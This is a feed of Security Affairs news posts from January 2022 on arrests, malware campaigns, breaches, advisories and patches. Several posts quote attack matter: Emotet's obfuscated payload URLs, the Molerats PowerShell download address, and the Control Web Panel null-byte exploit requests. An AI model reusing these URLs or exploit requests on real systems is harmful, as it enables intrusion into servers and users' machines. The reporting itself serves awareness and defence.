There are new articles available, click to refresh the page.
Today — 24 January 2022Security Affairs

Russian authorities arrested the kingpin of cybercrime Infraud Organization

24 January 2022 at 14:33

Russian authorities arrested four alleged members of the international cyber theft ring tracked as ‘Infraud Organization.’

In February 2008, the US authorities dismantled the global cybercrime organization tracked as Infraud Organization, which was involved in stealing and selling credit card and personal identity data.

The Justice Department announced indictments for 36 people charged with being part of a crime ring. The group has been active since 2010 and was created in Ukraine by Svyatoslav Bondarenko. According to th experts, the activities of the gang caused $530 million in losses.

Bondarenko remained at large, but Russian co-founder Sergey Medvedev was arrested by the authorities in 2018.

Most of the members of the gang were arrested in the US (30), the remaining members come from Australia, Britain, France, Italy, Kosovo, and Serbia.

The indicted leaders of the organization included people from the United States, France, Britain, Egypt, Pakistan, Kosovo, Serbia, Bangladesh, Canada and Australia.

The motto of the Infraud Organization was “In Fraud We Trust,” it has a primary role in the criminal ecosystem as a “premier one-stop shop for cybercriminals worldwide,” explained Deputy Assistant Attorney General David Rybicki.

The Infraud Organization used a number of websites to commercialize the data, it implemented a classic and efficient e-commerce for the stolen card and personal data, implementing also a rating and feedback system and an escrow” service for payments in digital currencies like Bitcoin.

Last week, Russian authorities arrested Andrey Sergeevich Novak, an alleged leader of the gang. According to the TASS media agency, other three individuals (Kirill Samokutyaev, Konstantin Vladimirovich Bergman and Mark Avramovich Bergman) are under house arrest.

Russia’s FSB and law enforcement have detained four members of the Infraud Organization hacking group. Its purported founder Andrey Novak is wanted in the US on the accusations of cybercrime. As a source in law enforcement told TASS, Novak was arrested while three other purported hackers are under a house arrest.

“During intelligence-gathering activities, Russian special services with the operational support of the law enforcement and cooperation of the US law enforcement, managed to establish and detain four members of the Infraud Organization hacking group whose main income was the use of stolen credit card data.” reported the TASS,

“The purported founder of the criminal group, Andrey Sergeevich Novak, wanted in the US on the accusations of cybercrime, has been arrested for two months, another three members of the group – Kirill Samokutyaev, Konstantin Vladimirovich Bergman and Mark Avramovich Bergman have been detained under a house arrest,” the source said.

Novak, aka “Unicc,” “Faaxxx,” and “Faxtrod,” will be judged in Russia and will not be extradited to the United States.

“According to an informed source, Russia is not planning to extradite Novak to the US. “Russian legislation prohibits an extradition of its citizens to a foreign state,” the source said. That said, if a foreign citizen wanted abroad is among the arrested, that individual will be extradited following the investigation and court proceedings in Russia, the source added.” continues the press agency.

Recently, the Russian Federal Security Service (FSB) announced to have shut down the REvil ransomware gang, the group that is behind a long string of attacks against large organizations, such as Kaseya and JBS USA. The FSB claims to have identified all members of the REvil gang and monitored their operations.

The police operation was conducted by Russian authorities following a request by the United States that shared info about members of the gang.

The Russian police arrested 14 alleged members of the ransomware gang and raided 25 addresses seizing computer equipment and cryptocurrency wallets.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, cybercrime)

The post Russian authorities arrested the kingpin of cybercrime Infraud Organization appeared first on Security Affairs.

Emotet spam uses unconventional IP address formats to evade detection

24 January 2022 at 12:05

Experts warn Emotet malware campaign using “unconventional” IP address formats in an attempt to evade detection.

Threat actors behind a recent Emotet malware campaign have been observed using using “unconventional” IP address formats to evade detection. Trend Micro researchers reported that threat actors are using hexadecimal and octal representations of the IP address.

“We observed Emotet spam campaigns using hexadecimal and octal representations of IP addresses, likely to evade detection via pattern matching. Both routines use social engineering techniques to trick users into enabling document macros and automate malware execution. Upon receiving these standards, operating systems (OS) automatically convert the values to the dotted decimal quad representation to initiate the request from the remote servers.” reported Trend Micro.

The attack chain is the same used in previous campaigns, treat actors distribute the malware through weaponized Excel documents using Excel 4.0 Macros, a dated feature used to automate repetitive tasks in the popular Office software.

Once tricked recipient in enabling document macros, the malicious code will contact a URL that’s obfuscated with carets (“h^tt^p^:/^/0xc12a24f5/cc.html”), with the host incorporating a hexadecimal representation of the IP address to execute an HTML application (HTA) code from a remote host under the control of the attackers:

Emotet evasion technique

Experts pointed out that once executed, the macro also invokes cmd.exe > mshta.exe with the URL as an argument to download and execute an HTA code from the remote host. This specific behavior could be used to detect the ongoing attack.

The researchers also spotted another variant of this malspam campaign that obfuscated the URL with carets but the IP contains an octal representation. Decoding the string “h^tt^p^:/^/0056.0151.0121.0114/c.html” into a dotted quad format we obtain 46[.]105[.]81[.]76.

“Moreover, the unconventional use of hexadecimal and octal IP addresses may result in evading current solutions reliant on pattern matching. But in the same vein, the unusual technique in the command lines can be used as a detection opportunity, with security teams using filters as leverage that can be enabled to treat such IP addresses as suspicious and associate them with malware.” concludes the report that also includes indicators of compromise for these attacks.

The Emotet banking trojan has been active at least since 2014, the botnet is operated by a threat actor tracked as TA542. The infamous banking trojan was also used to deliver other malicious code, such as Trickbot and QBot trojans, or ransomware such as ContiProLockRyuk, and Egregor.

In mid-November researchers from multiple cybersecurity firms ([Cryptolaemus], [GData], and [Advanced Intel]) reported that threat actors are using the TrickBot malware to drop an Emoted loader on infected devices. The experts tracked the campaign aimed at rebuilding the Emotet botnet using TrickBot’s infrastructure as Operation Reacharound.

In December, the Emotet malware was observed directly installing Cobalt Strike beacons to give the attackers access to the target network.

Researchers from AdvIntel believe that the return will have a significant impact on the ransomware operations in the threat landscape, likely “the largest threat ecosystem shift in 2021” and beyond due to three reasons:

  1. Emotet’s unmatched continuous loader capabilities
  2. The correlation between these capabilities and the demanded of the contemporary cybercrime market
  3. The return of the TrickBot-Emotet-Ransomware triad resulted from the first two points.

The Emotet botnet was resurrected by its former operator, who was convinced by the Conti ransomware gang. The shutdown of the Emotet operation resulted in the lack of high-quality initial access brokers.

Qbot and TrickBot used Emotet’s service to deploy multiple ransomware strains, including ContiDoppelPaymerEgregorProLockRyuk, and others).

The vacuum left by Emotet shutdown urged its resurgence, for this reason, its return will have a major impact on the threat landscape.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Emotet)

The post Emotet spam uses unconventional IP address formats to evade detection appeared first on Security Affairs.

Crooks tampering with QR Codes to steal victim money and info, FBI warns

24 January 2022 at 06:40

The FBI warns that cybercriminals are using malicious QR codes to steal their credentials and financial info.

The Federal Bureau of Investigation (FBI) published a public service announcement (PSA) to warn that cybercriminals are using QR codes to steal their credentials and financial info.

QR codes are widely adopted by businesses to facilitate payment. In a classic use case, a business provides customers with a QR code directing them to a site where they can make a payment.

Crooks can replace the QR code with a tampered one and hijack the sender’s payment.

Unaware people that scan the QR codes are redirected to malicious websites that are crafted to steal login and financial information.

“cybercriminals are taking advantage of this technology by directing QR code scans to malicious sites to steal victim data, embedding malware to gain access to the victim’s device, and redirecting payment for cybercriminal use.” reads the FBI’s PSA. “Cybercriminals tamper with both digital and physical QR codes to replace legitimate codes with malicious codes. A victim scans what they think to be a legitimate code but the tampered code directs victims to a malicious site, which prompts them to enter login and financial information.”

Malicious websites could also deliver malware on the victims’ devices or hijack their payments to accounts under their control.

“While QR codes are not malicious in nature, it is important to practice caution when entering financial information as well as providing payment through a site navigated to through a QR code,” the FBI states. 

The FBI announcement includes tips to protect people from such kind of attacks; feds recommend checking the URL obtained by scanning a QR code to make sure it is the intended site and looks authentic. Threat actors could use a malicious domain name that is similar to the intended URL but with typos or a misplaced letter.

Double-check any site navigated to from a QR code before providing login, personal, or financial information.

If scanning a physical QR code, ensure the code has not been tampered with, such as with a sticker placed on top of the original code.

Never download an app from a QR code, avoid making any payment requested through unsolicited email that uses social engineering techniques to trick recipients into scanning the embedded QR code.

Do not download a QR code scanner app from unofficial stores to avoid being infected with tainted apps, most phones today have a built-in scanner through the camera app.

If users will receive a QR code from someone they know, they can reach them via an alternative channel to verify that the code is from them.

Never make payments through a site navigated to from a QR code, it is recommended to manually enter a known and trusted URL to complete the payment.

In November, the FBI Internet Crime Complaint Center (IC3) published an alert to warn the public of fraudulent schemes leveraging cryptocurrency ATMs and Quick Response (QR) codes to complete payment transactions.This payment option makes it quite impossible to recover the money stolen with fraudulent schemes.

QR codes can be used at cryptocurrency ATMs to transfer money to an intended recipient and crooks started using them to receive payments from victims.

Fraudulent schemes include online impersonation in which scammer poses as a familiar entity (i.e. The government, law enforcement, a legal office, or a utility company), romance scams, and lottery schemes (scammer attempt to convince victims that they have won an award).

In all the fraudulent schemes, scammers provide a QR code associated with the scammer’s cryptocurrency wallet that the victim has to use during the transaction. The victims are instructed to make the transition at a physical cryptocurrency ATM where inserting money that can purchase cryptocurrency before transferring them using the provided QR code.

In these schemes, the scammers are in constant online communication with the victims and provide step-by-step instructions to make the payment.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, QR codes)

The post Crooks tampering with QR Codes to steal victim money and info, FBI warns appeared first on Security Affairs.

F5 fixes 25 flaws in BIG-IP, BIG-IQ, and NGINX products

24 January 2022 at 06:15

Cybersecurity provider F5 released security patches to address 25 vulnerabilities affecting its BIG-IP, BIG-IQ, and NGINX products.

Cybersecurity firm F5 announced security patches for 25 vulnerabilities affecting its BIG-IP, BIG-IQ, and NGINX products. Most of the vulnerabilities (23) addressed by the company affect the BIG-IP application delivery controller (ADC), 13 of them have been rated as high-severity issues (CVSS score 7.5).

The issues received CVEs between CVE-2022-23010 to CVE-2022-23032.

The vulnerabilities can cause the termination of the Traffic Management Microkernel (TMM), can lead to an increase in memory resource utilization, freezing virtual servers, or executing JavaScript code.

F5 addressed the flaws with the release of versions 14.x, 15.x, and 16.x.

The security provider also addressed two high-severity vulnerabilities in BIG-IQ centralized management and NGINX controller API management tracked as CVE-2022-23009 and CVE-2022-23008 respectively.

Regarding the CVE-2022-23008 flaw, an authenticated attacker with access to the ‘user’ or ‘admin’ role can use undisclosed API endpoints on NGINX Controller API Management to inject JavaScript code that is executed on managed NGINX data plane instances.

All the medium-severity vulnerabilities affect BIG-IP, but the CVE-2022-23023 issue also impacts BIG-IQ as well.

The company has also addressed a low-severity vulnerability, tracked as CVE-2022-23032, that can lead to a DNS rebinding attack.

The United States Cybersecurity and Infrastructure Security Agency (CISA) published a security advisory to encourage administrators to review the F5 security advisory.

“F5 has released its January 2022 Quarterly Security Notification addressing vulnerabilities affecting multiple versions of BIG-IP, BIG-IQ, and NGINX Controller API Management. A remote attacker could exploit these vulnerabilities to either deny service to, or take control of, an affected system.” reads the advisory published by CISA.

“CISA encourages users and administrators to review the F5 security advisory and install updated software or apply the necessary mitigations as soon as possible.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, REvil ransomware)

The post F5 fixes 25 flaws in BIG-IP, BIG-IQ, and NGINX products appeared first on Security Affairs.

Yesterday — 23 January 2022Security Affairs

OpenSubtitles data breach impacted 7 million subscribers

23 January 2022 at 19:39

OpenSubtitles has suffered a data breach, the maintainers confirmed that the incident impacted 7 Million subscribers.

OpenSubtitles is a popular subtitles websites, it suffered a data breach that affected 6,783,158 subscribers. Exposed data include email and IP addresses, usernames, the country of the user and passwords stored as unsalted MD5 hashes.

The administrator of the website become aware of the hack after a hacker notified them via Telegram in August 2021 demanding the payment of a ransom. The attacker also offered his support to OpenSubtitles to address the security flaws he has found on the website. Administrators of the website agreed to pay the ransom due to the low amount, but after receiving the ransom, the attackers never helped them to secure the website and on 11 January 2022 they leaked the data online.

The hack is the result of poor cyber security since its launch in 2006, administrator OSS said. It seems that the threat actor exploited a SQL injection to access the database of the website.

“In August 2021 we received message on Telegram from a hacker, who showed us proof that he could gain access to the user table of opensubtitles.org, and downloaded a SQL dump from it.” reads a data breach notification published on the website. “He asked for a BTC ransom to not disclose this to public and promise to delete the data.

“We hardly agreed, because it was not low amount of money. He explained us how he could gain access, and helped us fix the error. On the technical side, he was able to hack the low security password of a SuperAdmin, and gained access to an unsecured script, which was available only for SuperAdmins. This script allowed him to perform SQL injections and extract the data.”

The financial data of the subscribers haven’t been compromised by the attacker.

Subscribers are recommended to change opensubtitles.org and opensubtitles.com and forum password. Subscribers that shared opensubtitles.org password somewhere else are recommended to change it as well.

Administrators announced the improvement of the security of the website, including the introduction of new password policy.

“The site SHOULD be more secure now, we improved the way users are connecting to the site, the accounts will be locked after some successful logins, we introduced new password policy, we removed session info from table, IP should not be spoofable anymore, Captchas on login, register, password-reset, CSRF on forms, requests will be cancelled if admins change their IP during session, user passwords are saved in safe form using hash_hmac and sha256 algo with salt and pepper, all md5() passwords are deleted. For IT geeks – yes, we are using password_hash(), with peppered sha256 password, BCRYPT and for verification password_verify()” concludes the notification. “Note that our new site, opensubtitles.com was built with stronger security concerns, and already included all the points described above.”

Subscribers can check if their data have been exposed by querying the data breach notification website Have I Been Pwned that received the list of compromised users.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, OpenSubtitles)

The post OpenSubtitles data breach impacted 7 million subscribers appeared first on Security Affairs.

US CISA added 17 flaws to its Known Exploited Vulnerabilities Catalog

23 January 2022 at 18:13

US CISA added seventeen new actively exploited vulnerabilities to the ‘Known Exploited Vulnerabilities Catalog’.

The ‘Known Exploited Vulnerabilities Catalog‘ is a list of known vulnerabilities that threat actors have abused in attacks and that are required to be addressed by Federal Civilian Executive Branch (FCEB) agencies.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Known Exploited Vulnerabilities Catalog and address the vulnerabilities in their infrastructure.

The Cybersecurity and Infrastructure Security Agency (CISA) this week added seventeen actively exploited vulnerabilities to the Catalog.

The total number of vulnerabilities included in the catalog reached this week 341 vulnerabilities.

CISA is requiring 10 of 17 vulnerabilities added this week to be addressed within February 1st, 2022.

CVE Number CVE Title Required Action Due Date
CVE-2021-32648 October CMS Improper Authentication 2/1/2022
CVE-2021-21315 System Information Library for node.js Command Injection Vulnerability 2/1/2022
CVE-2021-21975 Server Side Request Forgery in vRealize Operations Manager API Vulnerability 2/1/2022
CVE-2021-22991 BIG-IP Traffic Microkernel Buffer Overflow Vulnerability 2/1/2022
CVE-2021-25296 Nagios XI OS Command Injection Vulnerability 2/1/2022
CVE-2021-25297 Nagios XI OS Command Injection Vulnerability 2/1/2022
CVE-2021-25298 Nagios XI OS Command Injection Vulnerability 2/1/2022
CVE-2021-33766 Microsoft Exchange Server Information Disclosure Vulnerability 2/1/2022
CVE-2021-40870 Aviatrix Controller Unrestricted Upload of File Vulnerability 2/1/2022
CVE-2021-35247 SolarWinds Serv-U Improper Input Validation Vulnerability 02/04/2022
CVE-2020-11978 Apache Airflow Command Injection Vulnerability 7/18/2022
CVE-2020-13671 Drupal Core Unrestricted Upload of File Vulnerability 7/18/2022
CVE-2020-13927 Apache Airflow Experimental API Authentication Bypass Vulnerability 7/18/2022
CVE-2020-14864 Oracle Corporate Business Intelligence Enterprise Edition Path Traversal Vulnerability 7/18/2022
CVE-2006-1547 Apache Struts 1 ActionForm Denial of Service Vulnerability 07/21/2022
CVE-2012-0391 Apache Struts 2 Improper Input Validation Vulnerability 07/21/2022
CVE-2018-8453 Microsoft Windows Win32k Privilege Escalation Vulnerability 07/21/2022

One of the issues added this week is a vulnerability in the October CMS, tracked as CVE-2021-32648, which was recently exploited in attacks against websites of the Ukrainian government.

CISA also added a vulnerability, tracked as CVE-2021-35247, recently addressed by SolarWinds in Serv-U products that threat actors are actively exploited in the wild. The company pointed out that all the attack attempts failed.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Known Exploited Vulnerabilities Catalog)

The post US CISA added 17 flaws to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

Molerats cyberespionage group uses public cloud services as attack infrastructure

23 January 2022 at 14:41

Cyberespionage group Molerats has been observed abusing legitimate cloud services, like Google Drive and Dropbox as attack infrastructure.

Zscaler ThreatLabz analyzed an active espionage campaign carried out by Molerats cyberespionage group (aka TA402, Gaza Hackers Team, Gaza Cybergang, and Extreme Jackal) that abuses legitimate cloud services like Google Drive and Dropbox as attack infrastructure. Public cloud services are used to host malicious payloads or for command-and-control infrastructure in attacks aimed at targets across the Middle East.

In December 2021, ThreatLabz researchers identified several macro-based MS office files that were used in attacks against entities in the Middle East. The bait files were employed in cyber espionage attacks, they contain decoy themes related to geo-political conflicts between Israel and Palestine. Similar bait files were also used in previous cyberespionage campaigns attributed to the Molerats APT group.

MoleRATs is an Arabic-speaking, politically motivated group of hackers that has been active since 2012, 

The researchers discovered that the current campaign has been active since July 2021, the threat actors switched the distribution method in December 2021 and applied minor changes in the .NET backdoor.

“The targets in this campaign were chosen specifically by the threat actor and they included critical members of banking sector in Palestine, people related to Palestinian political parties, as well as human rights activists and journalists in Turkey.” reads the analysis published by Zscaler.

The macro code embedded in the weaponized decoy document simply executes a command using cmd.exe which in turn executes a PowerShell command to download and drop the stage-2 payload from the URL (“http://45.63.49[.]202/document.html”) to the path “C:\ProgramData\document.htm”. Executes servicehost.exe

Then it renames document.htm to servicehost.exe and executes ‘servicehost.exe.’

moletats APT attacks

The .NET-based malware masquerades itself as a WinRAR application by using the icon and other resources and is obfuscated using the ConfuserEx packer.

The backdoor performs the following operations:

1. Collects the machine manufacture and machine model information using WMI which is used for execution environment checks and is later exfiltrated to C2 server.
2. Checks if it should execute in the current execution environment.
3. Creates a mutex with the name of executing binary.
4. Checks if the mutex is created successfully.
5. Determines if it is executed for the first time using the registry key value “HKCU/Software/{name_of_executing_binary}/{name_of_executing_binary}”. 
6. If the registry key doesn’t exist, the code flow goes via a mouse check function which executes the code further only if it detects a change in either of the mouse cursor coordinates. In the end, the mouse check function also creates the same registry key.

The backdoor supports multiple capabilities, such as taking snapshots, listing and uploading files, and running arbitrary commands on the compromised system.

“The major difference between the new attack chain and the old attack chain is seen in the backdoor delivery. Although we are not sure how these RAR/ZIP files were delivered but considering the past attacks they were likely delivered using Phishing PDFs. Additionally, we found a minor variation in the way the backdoor extracted the primary Dropbox account token.” Zscaler ThreatLabz researchers conclude.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Molerats APT)

The post Molerats cyberespionage group uses public cloud services as attack infrastructure appeared first on Security Affairs.

Security Affairs newsletter Round 350

23 January 2022 at 08:57

A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

If you want to also receive for free the newsletter with the international press subscribe here.

Pay attention to Log4j attacks, Dutch National Cybersecurity Centre (NCSC) warns
Vulnerabilities in Control Web Panel potentially expose Linux Servers to hack
US Treasury Department sanctions 4 Ukrainian officials for working with Russian intelligence
A bug in McAfee Agent allows running code with Windows SYSTEM privileges
Experts warn of anomalous spyware campaigns targeting industrial firms
Google Project Zero discloses details of two Zoom zero-day flaws
MoonBounce UEFI implant spotted in a targeted APT41 attack
Conti ransomware gang started leaking files stolen from Bank Indonesia
FBI links the Diavol ransomware to the TrickBot gang
Cisco StarOS flaws could allow remote code execution and information disclosure
Crypto.com hack impacted 483 accounts and resulted in a $34 million theft
Red Cross hit by a sophisticated cyberattack
New BHUNT Stealer targets cryptocurrency wallets
SolarWinds Serv-U bug exploited by threat actors in the wild, Microsoft warns
New DDoS IRC Bot distributed through Korean webHard platforms
UK NCSC shares guidance for organizations to secure their communications with customers
CISA warns of potential critical threats following attacks against Ukraine
Box flaw allowed to bypass MFA and takeover accounts
Is White Rabbit ransomware linked to FIN8 financially motivated group?
AlphV/BlackCat ransomware gang published data stolen from fashion giant Moncler
Financially motivated Earth Lusca threat actors targets organizations worldwide
Law enforcement shutdown the VPN service VPNLab used by many cybercriminal gangs
Microsoft releases Windows out-of-band emergency fixes for Win Server, VPN issues
A small number of Crypto.com users reported suspicious activity on their wallet
Oracle Critical Patch Update for January 2022 will fix 483 new flaws
Zoho fixes a critical vulnerability (CVE-2021-44757) in Desktop Central solutions
High-Severity flaw in 3 WordPress plugins impacts 84,000 websites
Experts warn of attacks using a new Linux variant of SFile ransomware
Kyiv blames Belarus-linked APT UNC1151 for recent cyberattack
European Union simulated a cyber attack on a fictitious Finnish power company
Microsoft spotted a destructive malware campaign targeting Ukraine
A new wave of Qlocker ransomware attacks targets QNAP NAS devices
Threat actors stole $18.7M from the Lympo NTF platform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 350 appeared first on Security Affairs.

Before yesterdaySecurity Affairs

Pay attention to Log4j attacks, Dutch National Cybersecurity Centre (NCSC) warns

22 January 2022 at 20:34

The Dutch National Cybersecurity Centre (NCSC) warns organizations of risks associated with cyberattacks exploiting the Log4J vulnerability.

The Dutch National Cybersecurity Centre (NCSC) warns organizations to remain vigilant on possible attacks exploiting the Log4J vulnerability.

According to the Dutch agency, threat actors the NCSC will continue to attempt to exploit the Log4Shell flaw in future attacks.

“Partly due to the rapid actions of many organizations, the extent of active abuse appears to be not too bad at the moment. But that doesn’t mean it stops there. It is expected that malicious parties will continue to search for vulnerable systems and carry out targeted attacks in the coming period. It is therefore important to remain vigilant.” states the Dutch NCSC agency. “The NCSC advises organizations to continue to monitor whether vulnerable systems are used and to apply updates or mitigating measures where necessary. In addition, the NCSC advises directors to stay alert by informing themselves about Log4j and the possible impact of abuse on business continuity.”

The risk that cybercriminal groups and nation-state actors could exploit Log4j vulnerabilities in future attacks is still high.

Recently Microsoft posted a warning about a new campaign from a China-based actor it tracks as DEV-0401 to exploit the Log4Shell vulnerability on VMware Horizon systems exposed on the internet, and deploy Night Sky ransomware.

In the last weeks other ransomware gangs exploited the Log4Shell in their attacks, the Conti ransomware gang was the first group that exploited the CVE-2021-44228 flaw since mid December.

In the same period, Bitdefender researchers discovered that threat actors were attempting to exploit the Log4Shell vulnerability to deliver the new Khonsari ransomware on Windows machines

The NCSC will continue to share information through its website and GitHub repository, the latter contains operational information regarding the Log4shell vulnerability in the Log4j logging library. Especially CVE-2021-44228 / CVE-2021-45046 and also covers CVE-2021-4104 / CVE-2021-45105.  

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, log4j)

The post Pay attention to Log4j attacks, Dutch National Cybersecurity Centre (NCSC) warns appeared first on Security Affairs.

Vulnerabilities in Control Web Panel potentially expose Linux Servers to hack

22 January 2022 at 16:29

Two critical security vulnerabilities in Control Web Panel potentially expose Linux servers to remote code execution attacks

Researchers from Octagon Networks disclosed details of two critical security flaws in Control Web Panel that potentially expose Linux servers to remote code execution attacks.

Control Web Panel is a popular open-source Linux control panel for servers and VPS that allows easy management of web hosting environments.

An attacker could chain the vulnerabilities to achieve pre-authenticated remote code execution on vulnerable Linux servers.

The first issue, tracked as CVE-2021-45467, is a file inclusion vulnerability that occurs when a web application is tricked into exposing or running arbitrary files on the webserver.

Experts focused their analysis on vulnerabilities that can be exploited by unauthenticated users or through zero-click attacks, in particular, they tested sections of the panel that are exposed without authentication in the webroot, including /user/loader.php and /user/index.php.

The expert Paulos Yibelo from Octagon Networks discovered that several PHP’s functions (including the require() and include() functions) seem to process /.%00./ as /../. Protections implemented in the application don’t allow to switch to a parent directory (using “..”) but they allow the PHP interpreter to accept a specially crafted string such as “.$00.” that allows bypassing any restriction,

Similarly, while stristr() ignores the null bytes, it still counts its size so it bypasses the check.

This means that it is possible to include any file on the server, if an attacker finds a way to write to a file, it can get preauth RCE.

Despite unix file r/w locking settings in CWP, an attacker can exploit the file inclusion bug to reach the restricted API section, which requires API key to access and is not exposed in the webroot.

Chaining this flaw with an arbitrary file writes vulnerability such as the CVE-2021-45466 flaw, an attacker can gain full remote code execution on the server.

“But by using our file inclusion, sending a request like the following will result in the server registering any API key we want.” explained the expert.

GET https://CWP/user/loader.php?api=1&scripts= .%00./.%00./api/account_new_create&acc=guadaapi&ip= 

“Now we have added the api key “OCTAGON” requesting from to have access to the full API like the following: 

GET https://CWP/api/?key=OCTAGON&api=add_server is now a valid API request.

The expert found a way to exploit a file write bug in the API section that allowed him to a .TXT file. For example, using a maliciously added key.


That will write to a file called authorized_keys located in the /resources/ folder. Then, using the first file inclusion bug the expert includes it malicious authorized_keys file to get full RCE.

The CWP maintainers have already addressed the flaw with security updates released this month.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Control Web Panel)

The post Vulnerabilities in Control Web Panel potentially expose Linux Servers to hack appeared first on Security Affairs.

US Treasury Department sanctions 4 Ukrainian officials for working with Russian intelligence

22 January 2022 at 13:20

The U.S. Treasury Department announced sanctions against four current and former Ukrainian government officials for collaborating with Russia.

The U.S. Treasury Department this week announced sanctions against four current and former Ukrainian government officials for having supported influence activities carried out by the Russian government. The officials are accused of having gathered sensitive information about critical infrastructure in Ukraine.

“Today, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned four individuals engaged in Russian government-directed influence activities to destabilize Ukraine.” reads the press release published by U.S. Treasury Department. “This action is separate and distinct from the broad range of high impact measures the United States and its Allies and partners are prepared to impose in order to inflict significant costs on the Russian economy and financial system if it were to further invade Ukraine.”

According to the US agency, Russia’s security service, the Federal Security Service (FSB), recruited Ukrainian citizens in key positions to destabilize the political and social contest country.

The four individuals were involved in the influence campaign with different roles, the suspects have supported threat actors in carrying out an influence campaign.

Two of the four individuals, Taras Kozak and Oleh Voloshyn, who are two current Ukrainian Members of Parliament from the party led by Victor Medvedchuk (Medvedchuk), supported Russian disinformation by amplifying false narratives and undermining Ukrainian sovereignty.

Kozak controls several news channels in Ukraine and is accused of having supported the Russian intelligence to denigrate senior members of Ukrainian President Volodymyr Zelenskyy’s inner circle, accusing them of mismanagement of the COVID-19 pandemic.

Voloshyn has worked with Russia-linked actors to undermine Ukrainian government officials and advocate on behalf of Russia.

Vladimir Sivkovich, former Deputy Secretary of the Ukrainian National Security and Defense Council, supported Russian intelligence in carrying out influence operations to support the decision for Ukraine to officially cede Crimea to Russia in exchange for a drawdown of Russian-backed forces in the Donbas.

Volodymyr Oliynyk, is a former Ukrainian official, who currently resides in Moscow. He shares Russia’s anti-Western sentiments and in 2021, he worked for the FSB to gather information about Ukrainian critical infrastructure. 

“As Russia has pursued broad cyber operations against critical infrastructure, it has focused on disrupting one critical infrastructure sector in particular: Ukraine’s energy sector. Russia has also degraded Ukraine’s access to energy products in the middle of winter. Acting” continues the Treasury Department.

The US agency ordered to block all property and interests in property of the designated individuals described above that are in the United States or in the possession or control of U.S. persons. Any entities that are owned, directly or indirectly, 50 percent or more by one or more blocked persons are also blocked. 

“The prohibitions include the making of any contribution or provision of funds, goods, or services by, to, or for the benefit of any blocked person, or the receipt of any contribution or provision of funds, goods, or services from any such person.” concludes the Agency

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, FSB)

The post US Treasury Department sanctions 4 Ukrainian officials for working with Russian intelligence appeared first on Security Affairs.

A bug in McAfee Agent allows running code with Windows SYSTEM privileges

21 January 2022 at 22:19

McAfee addressed a security flaw in its McAfee Agent software for Windows that allows running arbitrary code with SYSTEM privileges.

McAfee (now Trellix) has addressed a high-severity vulnerability, tracked as CVE-2022-0166, that resides in McAfee Agent software for Windows. An attacker can exploit this flaw to escalate privileges and execute arbitrary code with SYSTEM privileges.

The McAfee Agent is the distributed component of McAfee ePolicy Orchestrator (McAfee ePO). It downloads and enforces policies, and executes client-side tasks such as deployment and updating. The Agent also uploads events and provides additional data regarding each system’s status. It must be installed on each system in your network that you wish to manage.

The CVE-2022-0166 flaw was discovered by CERT/CC vulnerability analyst Will Dormann.

“A privilege escalation vulnerability in the McAfee Agent prior to 5.7.5. McAfee Agent uses openssl.cnf during the build process to specify the OPENSSLDIR variable as a subdirectory within the installation directory.” reads the advisory published by McAfee. “A low privilege user could have created subdirectories and executed arbitrary code with SYSTEM privileges by creating the appropriate pathway to the specifically created malicious openssl.cnf file.”

The security firm addressed the vulnerability with the release of McAfee Agent 5.7.5 on January 18.

The issue affects Agent versions prior of 5.7.5 and allows unprivileged attackers to run code using NT AUTHORITY\SYSTEM account privileges.

An unprivileged user can place a specially-crafted openssl.cnf in a location used by McAfee Agent, to execute arbitrary code with SYSTEM privileges on a Windows system running a vulnerable version of the agent software.

“By placing a specially-crafted openssl.cnf in a location used by McAfee Agent, an unprivileged user may be able to execute arbitrary code with SYSTEM privileges on a Windows system with the vulnerable McAfee Agent software installed.” reads the advisory published by CERT/CC.

The vulnerability is only exploitable locally, anyway, experts warn that this issue could be chained with other issues to compromise the target system and elevate permissions to carry out additional malicious activities.

McAfee also addressed a command Injection vulnerability, tracked as CVE-2021-31854, in software Agent for Windows prior to 5.7.5. An attacker could exploit this vulnerability to inject arbitrary shell code into the file cleanup.exe.

“The malicious clean.exe file is placed into the relevant folder and executed by running the McAfee Agent deployment feature located in the System Tree. An attacker may exploit the vulnerability to obtain a reverse shell which can lead to privilege escalation to obtain root privileges.” states the advisory.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, McAfee)

The post A bug in McAfee Agent allows running code with Windows SYSTEM privileges appeared first on Security Affairs.

Experts warn of anomalous spyware campaigns targeting industrial firms

21 January 2022 at 19:27

Researchers spotted several spyware campaigns targeting industrial enterprises to steal credentials and conduct financial fraud.

Researchers from Kaspersky Lab have uncovered multiple spyware campaigns that target industrial firms to steal email account credentials and carry out fraudulent activities.

Threat actors sent spear-phishing messages from compromised corporate accounts to their contacts, the email carry malicious attachments. The attackers use off-the-shelf spyware, but in order to avoid detection they limited the scope and lifetime of each sample to the bare minimum

These attacks were aimed at a very limited number of targets, they employed several spyware families, such as AgentTesla/Origin Logger, HawkEye, Noon/Formbook, Masslogger, Snake Keylogger, Azorult, Lokibot.

Kaspersky labeled these campaigns as ‘anomalous’ due to their very short-lived nature, roughly 25 days.

